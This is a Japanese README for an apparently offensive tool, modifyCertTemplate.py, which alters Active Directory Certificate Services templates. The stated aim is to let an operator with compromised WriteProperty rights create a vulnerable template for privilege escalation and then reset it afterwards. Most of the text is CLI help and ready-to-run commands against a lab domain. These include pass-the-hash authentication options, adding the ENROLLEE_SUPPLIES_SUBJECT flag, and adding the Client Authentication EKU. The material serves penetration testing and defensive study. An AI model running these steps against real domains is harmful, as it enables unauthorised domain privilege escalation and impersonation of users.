
このツールは、オペレーターがADCS証明書テンプレートを変更し、作成された脆弱な状態を特権昇格に利用できるようにする(その後、テンプレートを以前の状態にリセットする)ことを支援するために設計されています。これは、テンプレートに対するWriteProperty権限が侵害されたが、オペレーターがその権限がどのプロパティに適用されるか不明なシナリオ向けに特別に設計されています。このシナリオでは、テンプレートのACLをクエリし、該当するACE情報をプロパティGUIDと照合することで、変更可能なプロパティを特定できます。
関連するブログ記事(ツールとトピックについて)
usage: modifyCertTemplate.py [-h] -template template name [-property property name] [-value new value] [-get-acl] [-dn distinguished name] [-raw] [-add flag name] [-debug]
[-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-dc-ip ip address] [-ldaps]
target
Modify the attributes of an Active Directory certificate template
positional arguments:
target [[domain/]username[:password]
optional arguments:
-h, --help show this help message and exit
-template template name
Name of the target certificate template
-property property name
Name of the target template property
-value new value Value to set the specified template property to
-get-acl Print the certificate's ACEs
-dn distinguished name
Explicitly set the distinguished name of the certificate template
-raw Output the raw certificate template attributes
-add flag name Add a flag to an attribute, maintaining the existing flags
-debug Turn DEBUG output ON
authentication:
-hashes LMHASH:NTHASH
NTLM hashes, format is LMHASH:NTHASH
-no-pass don't ask for password (useful for -k)
-k Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will
use the ones specified in the command line
-aesKey hex key AES key to use for Kerberos Authentication (128 or 256 bits)
connection:
-dc-ip ip address IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter
-ldaps Use LDAPS instead of LDAP
証明書テンプレート(すべての属性)をクエリ
python3 modifyCertTemplate.py -template KerberosAuthentication ez.lab/administrator:pass
証明書テンプレートから単一の属性をクエリ
python3 modifyCertTemplate.py -template KerberosAuthentication -property msPKI-Certificate-Name-Flag ez.lab/administrator:pass
すべてのテンプレート属性の生の値をクエリ
python3 modifyCertTemplate.py -template KerberosAuthentication -raw ez.lab/administrator:pass
証明書テンプレートのACLをクエリ
python3 modifyCertTemplate.py -template KerberosAuthentication -get-acl ez.lab/administrator:pass
証明書テンプレートとは関係ありませんが、任意のオブジェクトのACLは、そのオブジェクトの識別名を指定することでクエリできます
python3 modifyCertTemplate.py -dn "CN=ws1,CN=computers,DC=ez,DC=lab" -get-acl ez.lab/administrator:pass
テンプレートのmsPKI-Certificate-Name-FlagプロパティにENROLLEE_SUPPLIES_SUBJECTフラグを追加
python3 modifyCertTemplate.py -template KerberosAuthentication -add enrollee_supplies_subject -property msPKI-Certificate-Name-Flag ez.lab/administrator:pass
証明書テンプレート属性(非リストプロパティ)の値を更新
python3 modifyCertTemplate.py -template KerberosAuthentication -property msPKI-Certificate-Name-Flag -value -150994944 ez.lab/administrator:pass
pKIExtendedKeyUsageプロパティにEKUを追加
python3 modifyCertTemplate.py -template KerberosAuthentication -add "client authentication" -property pKIExtendedKeyUsage ez.lab/administrator:pass
リスト形式の属性の値を更新(例:pKIExtendedKeyUsageの値を明示的に設定)
python3 modifyCertTemplate.py -template KerberosAuthentication -value "'1.3.6.1.5.5.7.3.4', '1.3.6.1.5.5.7.3.2'" -property pKIExtendedKeyUsage ez.lab/administrator:pass